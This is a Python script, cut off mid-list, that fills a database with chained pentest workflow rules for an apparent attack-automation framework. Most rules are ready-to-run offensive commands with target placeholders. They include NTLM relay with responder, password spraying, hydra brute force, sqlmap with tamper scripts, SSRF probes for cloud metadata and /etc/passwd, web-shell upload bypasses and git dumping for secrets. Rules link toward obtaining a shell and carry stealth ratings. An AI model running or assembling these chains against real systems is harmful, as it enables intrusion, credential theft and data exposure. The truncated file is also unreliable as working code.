#!/usr/bin/env python3
"""
Nexus Automation Framework - Workflow Rules Population

Populates the workflow_rules table with hundreds of creative,
real-world pentest workflow rules organized by phase and category.
"""

import json
import logging
import sqlite3
import sys
from datetime import datetime

logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger("populate_workflows")

DB_PATH = "knowledge.db"

def get_connection():
    conn = sqlite3.connect(DB_PATH, timeout=30)
    conn.execute("PRAGMA journal_mode=WAL")
    conn.execute("PRAGMA synchronous=NORMAL")
    return conn

# ═══════════════════════════════════════════════════════════════════════
# WORKFLOW RULES DATA
# Each rule: (rule_id, name, category, phase, trigger_condition,
#             actions, tools_required, priority, description,
#             expected_output, next_rules, failure_action,
#             timeout, stealth_level)
# ═══════════════════════════════════════════════════════════════════════

WORKFLOW_RULES = [
    # ─── RECONNAISSANCE ─────────────────────────────────────────────
    ("WF-RECON-001", "Initial Domain OSINT", "reconnaissance", "reconnaissance",
     "target_is_domain", 
     ["whois {target}", "dig +short {target} ANY", "host -t any {target}", "nslookup -type=any {target}"],
     ["whois", "dig", "host", "nslookup"], 9,
     "Perform comprehensive DNS and WHOIS reconnaissance on target domain",
     "Domain registrar, nameservers, IP addresses, mail servers, subdomains",
     ["WF-RECON-002", "WF-RECON-003", "WF-RECON-010"],
     "retry_with_different_dns", 120, "low"),

    ("WF-RECON-002", "Subdomain Enumeration", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["subfinder -d {target} -silent", "amass enum -passive -d {target}", "assetfinder --subs-only {target}"],
     ["subfinder", "amass", "assetfinder"], 9,
     "Enumerate all subdomains using multiple passive and active tools",
     "List of subdomains with IP resolution",
     ["WF-RECON-004", "WF-ENUM-001"],
     "use_alternative_wordlist", 600, "low"),

    ("WF-RECON-003", "IP Range Discovery", "reconnaissance", "reconnaissance",
     "target_is_ip_or_cidr",
     ["nmap -sn {target} --min-rate 100", "fping -a -g {target} 2>/dev/null", "arp-scan -l"],
     ["nmap", "fping", "arp-scan"], 9,
     "Discover live hosts in target IP range using ping sweep and ARP scan",
     "List of live hosts with MAC addresses",
     ["WF-ENUM-002", "WF-ENUM-003"],
     "increase_timeout_retry", 300, "medium"),

    ("WF-RECON-004", "Subdomain Takeover Check", "reconnaissance", "reconnaissance",
     "subdomains_discovered",
     ["for sub in {subdomains}; do host $sub; done", "subjack -w subdomains.txt -t 100 -timeout 30"],
     ["subjack", "host"], 7,
     "Check discovered subdomains for potential takeover vulnerabilities",
     "Subdomains pointing to unclaimed services (S3, Azure, GitHub Pages, etc.)",
     ["WF-EXPLOIT-040"],
     "log_and_continue", 300, "low"),

    ("WF-RECON-005", "Google Dorking", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["search: site:{target} filetype:pdf", "search: site:{target} filetype:xlsx", "search: site:{target} inurl:admin", "search: site:{target} intitle:index.of", "search: site:{target} ext:sql|bak|log|conf"],
     ["web_search"], 6,
     "Perform Google dork searches to find exposed files and admin panels",
     "Sensitive files, admin panels, exposed directories, config files",
     ["WF-RECON-006"],
     "log_and_continue", 180, "low"),

    ("WF-RECON-006", "Wayback Machine Enumeration", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["waybackurls {target} | sort -u", "gau {target} | sort -u"],
     ["waybackurls", "gau"], 6,
     "Retrieve historical URLs from Wayback Machine and other archives",
     "Historical URLs, old endpoints, removed pages, API endpoints",
     ["WF-RECON-007", "WF-WEB-020"],
     "log_and_continue", 300, "low"),

    ("WF-RECON-007", "Parameter Discovery from Archives", "reconnaissance", "reconnaissance",
     "wayback_urls_collected",
     ["cat wayback_urls.txt | grep '?' | unfurl keys | sort -u", "paramspider -d {target}"],
     ["unfurl", "paramspider"], 6,
     "Extract unique parameters from archived URLs for fuzzing targets",
     "List of parameters used across the application",
     ["WF-WEB-025", "WF-WEB-026"],
     "log_and_continue", 180, "low"),

    ("WF-RECON-008", "Certificate Transparency Logs", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["curl -s 'https://crt.sh/?q=%25.{target}&output=json' | jq -r '.[].name_value' | sort -u"],
     ["curl", "jq"], 7,
     "Query certificate transparency logs for additional subdomains and certificates",
     "Subdomains from SSL certificates, wildcard patterns",
     ["WF-RECON-002"],
     "log_and_continue", 120, "low"),

    ("WF-RECON-009", "Email Harvesting", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["theHarvester -d {target} -b all -l 500", "hunter.io API lookup"],
     ["theHarvester"], 5,
     "Harvest email addresses and metadata from public sources",
     "Email addresses, names, social media profiles",
     ["WF-RECON-050"],
     "log_and_continue", 300, "low"),

    ("WF-RECON-010", "DNS Zone Transfer Attempt", "reconnaissance", "reconnaissance",
     "nameservers_discovered",
     ["for ns in {nameservers}; do dig axfr {target} @$ns; done"],
     ["dig"], 8,
     "Attempt DNS zone transfers against all discovered nameservers",
     "Full DNS zone records if transfer succeeds",
     ["WF-ENUM-001"],
     "log_and_continue", 120, "medium"),

    ("WF-RECON-011", "Technology Stack Detection", "reconnaissance", "reconnaissance",
     "target_is_url",
     ["whatweb -a 3 {target}", "wappalyzer {target}", "httpx -tech-detect -status-code -title -follow-redirects -u {target}"],
     ["whatweb", "httpx"], 9,
     "Detect web technologies, frameworks, CMS, server software, and libraries",
     "Technology stack: CMS, framework, server, language, libraries, versions",
     ["WF-WEB-001", "WF-WEB-010", "WF-WEB-015"],
     "try_alternative_detection", 180, "low"),

    ("WF-RECON-012", "Cloud Infrastructure Detection", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["dig {target} | grep -E 'amazonaws|azure|cloudfront|google'", "nslookup {target}", "curl -sI {target} | grep -iE 'server|x-amz|x-azure|x-goog'"],
     ["dig", "curl"], 7,
     "Detect cloud hosting provider and infrastructure details",
     "Cloud provider (AWS/Azure/GCP), CDN, load balancer, WAF indicators",
     ["WF-RECON-013", "WF-EVASION-010"],
     "log_and_continue", 120, "low"),

    ("WF-RECON-013", "WAF Detection and Fingerprinting", "reconnaissance", "reconnaissance",
     "target_is_url",
     ["wafw00f {target}", "nmap --script http-waf-detect -p 80,443 {target_ip}"],
     ["wafw00f", "nmap"], 8,
     "Detect and fingerprint Web Application Firewalls protecting the target",
     "WAF vendor, type, bypass capabilities",
     ["WF-EVASION-010", "WF-EVASION-011"],
     "assume_waf_present", 120, "low"),

    ("WF-RECON-014", "S3 Bucket Enumeration", "reconnaissance", "reconnaissance",
     "cloud_provider_is_aws",
     ["aws s3 ls s3://{target_name} --no-sign-request", "s3scanner scan -bucket {target_name}"],
     ["aws", "s3scanner"], 7,
     "Enumerate and test access to S3 buckets related to target",
     "Bucket listing, public files, write access",
     ["WF-EXPLOIT-041"],
     "log_and_continue", 180, "low"),

    ("WF-RECON-015", "GitHub/GitLab Leak Detection", "reconnaissance", "reconnaissance",
     "target_is_domain",
     ["search: site:github.com {target} password|secret|api_key", "trufflehog --regex --entropy=False github --org={target_org}"],
     ["trufflehog", "web_search"], 7,
     "Search for leaked credentials and secrets in public code repositories",
     "API keys, passwords, tokens, private configurations",
     ["WF-EXPLOIT-042"],
     "log_and_continue", 300, "low"),

    # ─── ENUMERATION ────────────────────────────────────────────────
    ("WF-ENUM-001", "Full Port Scan", "enumeration", "enumeration",
     "live_hosts_discovered",
     ["nmap -sS -p- --min-rate 1000 -T4 {target}", "masscan {target} -p0-65535 --rate=1000"],
     ["nmap", "masscan"], 9,
     "Perform full TCP port scan on all discovered live hosts",
     "Complete list of open TCP ports per host",
     ["WF-ENUM-002", "WF-ENUM-003"],
     "reduce_rate_retry", 900, "medium"),

    ("WF-ENUM-002", "Service Version Detection", "enumeration", "enumeration",
     "open_ports_discovered",
     ["nmap -sV -sC -O -p {ports} {target}", "nmap --script=banner -p {ports} {target}"],
     ["nmap"], 9,
     "Detect service versions and run default scripts on all open ports",
     "Service names, versions, OS fingerprint, script output",
     ["WF-VULN-001", "WF-WEB-001"],
     "try_aggressive_detection", 600, "medium"),

    ("WF-ENUM-003", "UDP Service Scan", "enumeration", "enumeration",
     "live_hosts_discovered",
     ["nmap -sU --top-ports 100 -T4 {target}", "nmap -sU -p 53,67,68,69,111,123,135,137,138,139,161,162,445,500,514,520,631,1434,1900,4500,5353,49152 {target}"],
     ["nmap"], 7,
     "Scan top UDP ports for services like DNS, SNMP, TFTP, NTP",
     "Open UDP ports and services",
     ["WF-ENUM-010"],
     "increase_timeout_retry", 600, "medium"),

    ("WF-ENUM-004", "SMB Enumeration", "enumeration", "enumeration",
     "port_445_open OR port_139_open",
     ["enum4linux -a {target}", "smbclient -L //{target} -N", "smbmap -H {target}", "netexec smb {target} --shares"],
     ["enum4linux", "smbclient", "smbmap", "netexec"], 8,
     "Enumerate SMB shares, users, groups, and policies",
     "Shares, users, groups, password policy, OS info",
     ["WF-EXPLOIT-010", "WF-EXPLOIT-011"],
     "try_null_session", 300, "medium"),

    ("WF-ENUM-005", "LDAP Enumeration", "enumeration", "enumeration",
     "port_389_open OR port_636_open",
     ["ldapsearch -x -H ldap://{target} -b '' -s base '(objectclass=*)' namingContexts", "ldapsearch -x -H ldap://{target} -b '{base_dn}' '(objectclass=user)'"],
     ["ldapsearch"], 8,
     "Enumerate LDAP directory: users, groups, OUs, computer objects",
     "Domain structure, users, groups, GPOs, trust relationships",
     ["WF-EXPLOIT-012", "WF-EXPLOIT-020"],
     "try_authenticated_ldap", 300, "medium"),

    ("WF-ENUM-006", "SNMP Enumeration", "enumeration", "enumeration",
     "port_161_open",
     ["snmpwalk -v2c -c public {target}", "onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt {target}"],
     ["snmpwalk", "onesixtyone"], 7,
     "Enumerate SNMP data using common community strings",
     "System info, network interfaces, running processes, installed software",
     ["WF-EXPLOIT-013"],
     "try_different_community_strings", 300, "medium"),

    ("WF-ENUM-007", "NFS Enumeration", "enumeration", "enumeration",
     "port_2049_open OR port_111_open",
     ["showmount -e {target}", "nmap --script=nfs-ls,nfs-showmount,nfs-statfs -p 2049 {target}"],
     ["showmount", "nmap"], 7,
     "Enumerate NFS exports and permissions",
     "Exported shares, access permissions, mountable paths",
     ["WF-EXPLOIT-014"],
     "log_and_continue", 180, "medium"),

    ("WF-ENUM-008", "RPC Enumeration", "enumeration", "enumeration",
     "port_111_open OR port_135_open",
     ["rpcclient -U '' -N {target}", "rpcinfo -p {target}", "impacket-rpcdump {target}"],
     ["rpcclient", "rpcinfo", "impacket-rpcdump"], 6,
     "Enumerate RPC services and endpoints",
     "RPC programs, versions, protocols, port mappings",
     ["WF-ENUM-004", "WF-ENUM-005"],
     "log_and_continue", 180, "medium"),

    ("WF-ENUM-009", "SSH Enumeration", "enumeration", "enumeration",
     "port_22_open",
     ["nmap --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey -p 22 {target}", "ssh-audit {target}"],
     ["nmap", "ssh-audit"], 6,
     "Enumerate SSH configuration, algorithms, and authentication methods",
     "Supported algorithms, auth methods, key types, vulnerability indicators",
     ["WF-EXPLOIT-015", "WF-VULN-010"],
     "log_and_continue", 120, "low"),

    ("WF-ENUM-010", "DNS Enumeration", "enumeration", "enumeration",
     "port_53_open",
     ["dnsrecon -d {target} -t std,brt,axfr", "dnsenum {target}", "fierce --domain {target}"],
     ["dnsrecon", "dnsenum", "fierce"], 7,
     "Comprehensive DNS enumeration including brute force and zone transfers",
     "DNS records, subdomains, zone transfer results",
     ["WF-RECON-002"],
     "log_and_continue", 300, "low"),

    ("WF-ENUM-011", "FTP Enumeration", "enumeration", "enumeration",
     "port_21_open",
     ["nmap --script ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor -p 21 {target}", "ftp {target} -n -e 'user anonymous\\nls -la\\nquit'"],
     ["nmap", "ftp"], 7,
     "Enumerate FTP server: anonymous access, version, directory listing",
     "FTP version, anonymous access status, file listings",
     ["WF-EXPLOIT-016"],
     "log_and_continue", 120, "low"),

    ("WF-ENUM-012", "SMTP Enumeration", "enumeration", "enumeration",
     "port_25_open OR port_587_open",
     ["nmap --script smtp-commands,smtp-enum-users,smtp-open-relay -p 25,587 {target}", "smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t {target}"],
     ["nmap", "smtp-user-enum"], 6,
     "Enumerate SMTP server: commands, users, relay testing",
     "SMTP commands, valid users, open relay status",
     ["WF-EXPLOIT-017"],
     "log_and_continue", 300, "medium"),

    ("WF-ENUM-013", "MySQL Enumeration", "enumeration", "enumeration",
     "port_3306_open",
     ["nmap --script mysql-info,mysql-enum,mysql-empty-password,mysql-databases -p 3306 {target}", "mysql -h {target} -u root --connect-timeout=5 -e 'SELECT version();'"],
     ["nmap", "mysql"], 7,
     "Enumerate MySQL server version, databases, and test default credentials",
     "MySQL version, databases, user privileges, empty password status",
     ["WF-EXPLOIT-018"],
     "try_default_credentials", 180, "medium"),

    ("WF-ENUM-014", "MSSQL Enumeration", "enumeration", "enumeration",
     "port_1433_open",
     ["nmap --script ms-sql-info,ms-sql-config,ms-sql-empty-password -p 1433 {target}", "impacket-mssqlclient {target}"],
     ["nmap", "impacket-mssqlclient"], 7,
     "Enumerate Microsoft SQL Server: version, config, test auth",
     "MSSQL version, instance name, encryption status",
     ["WF-EXPLOIT-019"],
     "try_default_credentials", 180, "medium"),

    ("WF-ENUM-015", "Redis Enumeration", "enumeration", "enumeration",
     "port_6379_open",
     ["redis-cli -h {target} INFO", "redis-cli -h {target} CONFIG GET *", "nmap --script redis-info -p 6379 {target}"],
     ["redis-cli", "nmap"], 7,
     "Enumerate Redis: version, config, authentication status",
     "Redis version, config settings, keyspace, memory usage",
     ["WF-EXPLOIT-030"],
     "log_and_continue", 120, "low"),

    # ─── WEB APPLICATION ────────────────────────────────────────────
    ("WF-WEB-001", "Web Server Fingerprinting", "web_application", "enumeration",
     "http_service_detected",
     ["whatweb -a 3 {target}", "curl -sI {target} | head -30", "httpx -title -tech-detect -status-code -follow-redirects -u {target}"],
     ["whatweb", "curl", "httpx"], 9,
     "Deep fingerprint web server technology, headers, cookies",
     "Server type, version, X-Powered-By, framework, security headers",
     ["WF-WEB-002", "WF-WEB-003", "WF-WEB-010"],
     "try_different_user_agent", 120, "low"),

    ("WF-WEB-002", "Directory and File Brute Force", "web_application", "enumeration",
     "http_service_detected",
     ["gobuster dir -u {target} -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 50 -x php,asp,aspx,jsp,html,js,txt", "ffuf -u {target}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,403 -t 50"],
     ["gobuster", "ffuf"], 9,
     "Brute force directories and files with multiple wordlists",
     "Discovered directories, files, admin panels, backup files",
     ["WF-WEB-004", "WF-WEB-005"],
     "try_smaller_wordlist", 600, "medium"),

    ("WF-WEB-003", "Security Headers Analysis", "web_application", "enumeration",
     "http_service_detected",
     ["curl -sI {target} | grep -iE 'strict-transport|content-security|x-frame|x-content-type|x-xss|referrer-policy|permissions-policy|feature-policy'"],
     ["curl"], 7,
     "Analyze HTTP security headers for missing protections",
     "Missing headers: HSTS, CSP, X-Frame-Options, X-Content-Type-Options",
     ["WF-WEB-030"],
     "log_and_continue", 60, "low"),

    ("WF-WEB-004", "Admin Panel Discovery", "web_application", "enumeration",
     "http_service_detected",
     ["gobuster dir -u {target} -w /usr/share/seclists/Discovery/Web-Content/AdminPanels.txt -t 30", "ffuf -u {target}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt -mc 200,301,302"],
     ["gobuster", "ffuf"], 8,
     "Discover admin panels and management interfaces",
     "Admin panel URLs, login pages, management interfaces",
     ["WF-EXPLOIT-020", "WF-WEB-021"],
     "try_different_paths", 300, "medium"),

    ("WF-WEB-005", "Backup File Discovery", "web_application", "enumeration",
     "http_service_detected",
     ["ffuf -u {target}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc 200 -e .bak,.old,.backup,.zip,.tar.gz,.sql,.db,.swp,.sav,.conf.bak"],
     ["ffuf"], 7,
     "Search for backup files, old versions, and configuration files",
     "Backup files containing source code, configs, databases",
     ["WF-WEB-006"],
     "try_common_backup_names", 300, "medium"),

    ("WF-WEB-006", "Source Code Disclosure Check", "web_application", "enumeration",
     "backup_files_found OR git_directory_found",
     ["curl -s {target}/.git/HEAD", "curl -s {target}/.svn/entries", "curl -s {target}/.env", "curl -s {target}/web.config", "curl -s {target}/.htaccess"],
     ["curl", "git-dumper"], 8,
     "Check for exposed source code repositories and config files",
     "Git repository, SVN data, environment files, server configs",
     ["WF-WEB-007"],
     "log_and_continue", 180, "low"),

    ("WF-WEB-007", "Git Repository Dump", "web_application", "enumeration",
     "git_directory_exposed",
     ["git-dumper {target}/.git/ ./git_dump", "cd git_dump && git log --oneline -50", "git diff HEAD~10..HEAD"],
     ["git-dumper", "git"], 9,
     "Dump exposed .git directory and analyze commit history for secrets",
     "Full source code, commit history, hardcoded credentials, API keys",
     ["WF-EXPLOIT-042"],
     "log_and_continue", 300, "low"),

    ("WF-WEB-010", "JavaScript File Discovery and Download", "web_application", "enumeration",
     "http_service_detected",
     ["curl -s {target} | grep -oP 'src=\"[^\"]*\\.js[^\"]*\"' | sed 's/src=\"//;s/\"//'", "hakrawler -url {target} -js", "katana -u {target} -jc -d 3"],
     ["curl", "hakrawler", "katana"], 9,
     "Discover and catalog all JavaScript files loaded by the application",
     "Complete list of JS file URLs (internal and external)",
     ["WF-WEB-011"],
     "spider_for_more_js", 300, "low"),

    ("WF-WEB-011", "JavaScript Beautify and Analysis", "web_application", "analysis",
     "javascript_files_discovered",
     ["for f in *.js; do js-beautify $f > beautified_$f; done", "python3 -c 'import jsbeautifier; ...'"],
     ["js-beautify", "python3"], 9,
     "Download, beautify, and prepare JavaScript files for vulnerability analysis",
     "Beautified JS source code ready for pattern analysis",
     ["WF-WEB-012", "WF-WEB-013", "WF-WEB-014"],
     "try_manual_download", 300, "low"),

    ("WF-WEB-012", "JavaScript Secret Extraction", "web_application", "analysis",
     "javascript_files_beautified",
     ["grep -rniE '(api[_-]?key|secret|token|password|auth|bearer|jwt|private[_-]?key)\\s*[:=]\\s*[\"\\x27]' beautified_*.js", "nuclei -l js_urls.txt -t /root/nuclei-templates/exposures/tokens/"],
     ["grep", "nuclei"], 9,
     "Search beautified JavaScript for hardcoded secrets, API keys, and tokens",
     "API keys, tokens, passwords, internal URLs, debug endpoints",
     ["WF-EXPLOIT-042"],
     "try_regex_variations", 180, "low"),

    ("WF-WEB-013", "JavaScript Endpoint Extraction", "web_application", "analysis",
     "javascript_files_beautified",
     ["grep -rnoP '[\"\\'](/api/[^\"\\'>]+|/v[0-9]+/[^\"\\'>]+)' beautified_*.js | sort -u", "linkfinder -i {target} -o cli"],
     ["grep", "linkfinder"], 8,
     "Extract API endpoints, routes, and internal paths from JavaScript",
     "API routes, hidden endpoints, internal paths, WebSocket URLs",
     ["WF-WEB-025", "WF-WEB-026"],
     "log_and_continue", 180, "low"),

    ("WF-WEB-014", "JavaScript Vulnerability Pattern Scan", "web_application", "analysis",
     "javascript_files_beautified",
     ["grep -rniE '(eval\\(|innerHTML|document\\.write|dangerouslySetInnerHTML|\\$\\(|fromCharCode|decodeURI|setTimeout\\(|setInterval\\()' beautified_*.js",
      "grep -rniE '(postMessage|addEventListener.*message|window\\.opener|location\\.hash|document\\.referrer)' beautified_*.js",
      "semgrep --config=p/javascript beautified_*.js"],
     ["grep", "semgrep"], 8,
     "Scan JavaScript for DOM XSS sinks, eval injection, prototype pollution patterns",
     "Potential XSS sinks, unsafe eval usage, postMessage handlers, prototype pollution",
     ["WF-EXPLOIT-025"],
     "log_and_continue", 300, "low"),

    ("WF-WEB-015", "CMS Detection and Enumeration", "web_application", "enumeration",
     "cms_detected",
     ["wpscan --url {target} --enumerate ap,at,cb,dbe -t 20", "droopescan scan drupal -u {target}", "joomscan -u {target}"],
     ["wpscan", "droopescan", "joomscan"], 8,
     "Deep enumeration of detected CMS: plugins, themes, users, versions",
     "CMS version, installed plugins/themes, users, vulnerabilities",
     ["WF-EXPLOIT-020", "WF-EXPLOIT-021"],
     "try_alternative_cms_scanner", 600, "medium"),

    ("WF-WEB-016", "API Endpoint Fuzzing", "web_application", "enumeration",
     "api_endpoints_discovered",
     ["ffuf -u {target}/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403", "wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt --hc 404 {target}/api/FUZZ"],
     ["ffuf", "wfuzz"], 8,
     "Fuzz API endpoints to discover hidden routes and methods",
     "Hidden API endpoints, undocumented routes, admin APIs",
     ["WF-WEB-017"],
     "try_different_http_methods", 300, "medium"),

    ("WF-WEB-017", "API Method Testing", "web_application", "analysis",
     "api_endpoints_discovered",
     ["for endpoint in {endpoints}; do for method in GET POST PUT DELETE PATCH OPTIONS; do curl -sX $method {target}$endpoint -o /dev/null -w '%{http_code}'; done; done"],
     ["curl"], 7,
     "Test all HTTP methods on discovered API endpoints",
     "Allowed methods per endpoint, unexpected responses",
     ["WF-EXPLOIT-026"],
     "log_and_continue", 300, "low"),

    ("WF-WEB-018", "CORS Misconfiguration Check", "web_application", "analysis",
     "http_service_detected",
     ["curl -sI -H 'Origin: https://evil.com' {target} | grep -i 'access-control'", "curl -sI -H 'Origin: null' {target} | grep -i 'access-control'"],
     ["curl"], 7,
     "Test for CORS misconfigurations allowing cross-origin data theft",
     "CORS headers, reflected origins, null origin acceptance",
     ["WF-EXPLOIT-027"],
     "log_and_continue", 120, "low"),

    ("WF-WEB-019", "SSL/TLS Configuration Audit", "web_application", "enumeration",
     "https_service_detected",
     ["sslscan {target}", "sslyze --regular {target}", "nmap --script ssl-enum-ciphers -p 443 {target}"],
     ["sslscan", "sslyze", "nmap"], 7,
     "Audit SSL/TLS configuration: ciphers, protocols, certificate validity",
     "Weak ciphers, expired certs, protocol vulnerabilities, HSTS status",
     ["WF-VULN-015"],
     "log_and_continue", 180, "low"),

    ("WF-WEB-020", "Spider and Crawl Application", "web_application", "enumeration",
     "http_service_detected",
     ["katana -u {target} -d 5 -jc -kf -aff", "gospider -s {target} -d 3 -c 10 --js"],
     ["katana", "gospider"], 8,
     "Deep crawl the web application to discover all pages, forms, and resources",
     "Complete sitemap, forms, file uploads, interactive elements",
     ["WF-WEB-021", "WF-WEB-022"],
     "reduce_depth_retry", 600, "medium"),

    ("WF-WEB-021", "Form Analysis and Input Discovery", "web_application", "analysis",
     "forms_discovered",
     ["analyze forms for: hidden fields, CSRF tokens, file uploads, password fields, search inputs"],
     ["custom_analyzer"], 8,
     "Analyze all discovered forms for input types and potential vulnerabilities",
     "Form actions, methods, input types, hidden fields, CSRF status",
     ["WF-WEB-025", "WF-WEB-026", "WF-EXPLOIT-025"],
     "log_and_continue", 180, "low"),

    ("WF-WEB-022", "robots.txt and sitemap.xml Analysis", "web_application", "enumeration",
     "http_service_detected",
     ["curl -s {target}/robots.txt", "curl -s {target}/sitemap.xml", "curl -s {target}/sitemap_index.xml"],
     ["curl"], 6,
     "Analyze robots.txt and sitemap for hidden paths and disallowed areas",
     "Disallowed paths, sitemap URLs, hidden sections",
     ["WF-WEB-002"],
     "log_and_continue", 60, "low"),

    ("WF-WEB-025", "SQL Injection Testing", "web_application", "exploitation",
     "input_parameters_discovered",
     ["sqlmap -u '{target_with_params}' --batch --random-agent --level=3 --risk=2", "sqlmap -r request.txt --batch --random-agent --tamper=space2comment"],
     ["sqlmap"], 9,
     "Automated SQL injection testing on all discovered parameters",
     "SQL injection vulnerabilities, database type, extracted data",
     ["WF-EXPLOIT-003", "WF-EXPLOIT-004"],
     "try_different_tamper_scripts", 600, "medium"),

    ("WF-WEB-026", "XSS Testing", "web_application", "exploitation",
     "input_parameters_discovered",
     ["dalfox url '{target_with_params}' --silence --only-poc", "xsstrike -u {target_with_params} --crawl"],
     ["dalfox", "xsstrike"], 8,
     "Test for reflected and stored XSS on all input parameters",
     "XSS vulnerabilities, payloads, affected parameters",
     ["WF-EXPLOIT-006", "WF-EXPLOIT-007"],
     "try_encoding_bypass", 300, "medium"),

    ("WF-WEB-027", "SSRF Testing", "web_application", "exploitation",
     "url_parameter_found OR redirect_parameter_found",
     ["curl {target}?url=http://169.254.169.254/latest/meta-data/", "curl {target}?url=http://127.0.0.1:80", "curl {target}?url=file:///etc/passwd"],
     ["curl"], 8,
     "Test URL parameters for SSRF to access internal resources or cloud metadata",
     "Internal network access, cloud metadata, file read",
     ["WF-EXPLOIT-012"],
     "try_ssrf_bypasses", 180, "medium"),

    ("WF-WEB-028", "File Upload Testing", "web_application", "exploitation",
     "file_upload_found",
     ["upload test files: shell.php, shell.php.jpg, shell.phtml, shell.php%00.jpg", "test content-type bypass", "test double extension", "test magic bytes"],
     ["curl", "custom_uploader"], 9,
     "Test file upload for unrestricted upload, extension bypass, content-type bypass",
     "Shell upload, RCE via upload, bypass techniques",
     ["WF-EXPLOIT-035"],
     "try_alternative_extensions", 300, "medium"),

    ("WF-WEB-029", "Authentication Testing", "web_application", "exploitation",
     "login_form_found",
     ["hydra -l admin -P /usr/share/wordlists/rockyou.txt {target} http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'", "test default credentials", "test password reset flow"],
     ["hydra"], 8,
     "Test authentication: brute force, default creds, password reset, 2FA bypass",
     "Valid credentials, bypass methods, account lockout behavior",
     ["WF-EXPLOIT-020"],
     "check_lockout_and_adjust", 600, "high"),

    ("WF-WEB-030", "Nuclei Vulnerability Scan", "web_application", "vulnerability_assessment",
     "http_service_detected",
     ["nuclei -u {target} -severity low,medium,high,critical -t /root/nuclei-templates/ -c 50", "nuclei -u {target} -tags cve -severity critical,high"],
     ["nuclei"], 9,
     "Run Nuclei template-based vulnerability scanner against the target",
     "Known CVEs, misconfigurations, exposures, default credentials",
     ["WF-EXPLOIT-020"],
     "update_templates_retry", 600, "medium"),

    # ─── VULNERABILITY ASSESSMENT ───────────────────────────────────
    ("WF-VULN-001", "Automated Vulnerability Scan", "vulnerability", "vulnerability_assessment",
     "services_enumerated",
     ["nmap --script vuln -p {ports} {target}", "nikto -h {target} -C all"],
     ["nmap", "nikto"], 8,
     "Run automated vulnerability scanners against discovered services",
     "Known vulnerabilities, CVE matches, misconfigurations",
     ["WF-EXPLOIT-001"],
     "try_alternative_scanner", 600, "medium"),

    ("WF-VULN-002", "CVE Correlation", "vulnerability", "vulnerability_assessment",
     "service_versions_detected",
     ["searchsploit {service} {version}", "query knowledge_db for matching CVEs"],
     ["searchsploit"], 9,
     "Correlate detected service versions with known CVEs from knowledge base",
     "Matching CVEs with exploit availability and severity",
     ["WF-EXPLOIT-001"],
     "broaden_version_search", 180, "low"),

    ("WF-VULN-010", "SSH Vulnerability Assessment", "vulnerability", "vulnerability_assessment",
     "ssh_service_detected",
     ["nmap --script ssh-auth-methods,ssh2-enum-algos -p 22 {target}", "check CVE-2018-15473 username enum", "check for weak key exchange"],
     ["nmap", "ssh-audit"], 7,
     "Assess SSH for known vulnerabilities and weak configurations",
     "Weak algorithms, username enumeration, version-specific CVEs",
     ["WF-EXPLOIT-015"],
     "log_and_continue", 180, "low"),

    ("WF-VULN-015", "SSL/TLS Vulnerability Check", "vulnerability", "vulnerability_assessment",
     "https_service_detected",
     ["nmap --script ssl-heartbleed,ssl-poodle,ssl-ccs-injection,ssl-dh-params -p 443 {target}", "testssl.sh {target}"],
     ["nmap", "testssl.sh"], 7,
     "Check for Heartbleed, POODLE, BEAST, CRIME, DROWN, ROBOT, and other SSL/TLS vulns",
     "SSL/TLS vulnerabilities, weak configurations, certificate issues",
     ["WF-EXPLOIT-050"],
     "log_and_continue", 300, "low"),

    # ─── EXPLOITATION ───────────────────────────────────────────────
    ("WF-EXPLOIT-001", "Searchsploit CVE Exploit", "exploitation", "exploitation",
     "cve_match_found",
     ["searchsploit -m {exploit_id}", "modify exploit for target", "execute exploit"],
     ["searchsploit", "metasploit"], 9,
     "Search and deploy matching exploit from ExploitDB for confirmed CVE",
     "Exploit executed, shell or access obtained",
     ["WF-POST-001"],
     "try_alternative_exploit", 600, "high"),

    ("WF-EXPLOIT-010", "SMB Null Session Attack", "exploitation", "exploitation",
     "smb_null_session_allowed",
     ["smbclient -L //{target} -N", "rpcclient -U '' -N {target} -c 'enumdomusers'", "netexec smb {target} -u '' -p '' --shares"],
     ["smbclient", "rpcclient", "netexec"], 8,
     "Exploit null session to enumerate SMB shares, users, and groups",
     "User list, share list, password policy",
     ["WF-EXPLOIT-011"],
     "try_guest_account", 180, "medium"),

    ("WF-EXPLOIT-011", "SMB Relay Attack", "exploitation", "exploitation",
     "smb_signing_disabled",
     ["responder -I {interface} -wrf", "impacket-ntlmrelayx -tf targets.txt -smb2support"],
     ["responder", "impacket-ntlmrelayx"], 8,
     "Relay captured NTLM hashes to other targets with SMB signing disabled",
     "Authenticated sessions, command execution, hash capture",
     ["WF-POST-001", "WF-POST-005"],
     "try_different_relay_target", 600, "high"),

    ("WF-EXPLOIT-012", "LDAP Credential Spray", "exploitation", "exploitation",
     "ldap_users_discovered",
     ["netexec ldap {target} -u users.txt -p 'Password123!' --no-bruteforce", "kerbrute passwordspray --dc {target} -d {domain} users.txt 'Summer2024!'"],
     ["netexec", "kerbrute"], 8,
     "Password spray attack against discovered LDAP/AD users",
     "Valid credential pairs, successful authentications",
     ["WF-POST-001", "WF-POST-005"],
     "check_lockout_policy_first", 600, "high"),

    ("WF-EXPLOIT-015", "SSH Brute Force", "exploitation", "exploitation",
     "ssh_password_auth_enabled",
     ["hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh://{target}", "medusa -h {target} -U users.txt -P passwords.txt -M ssh -t 4"],
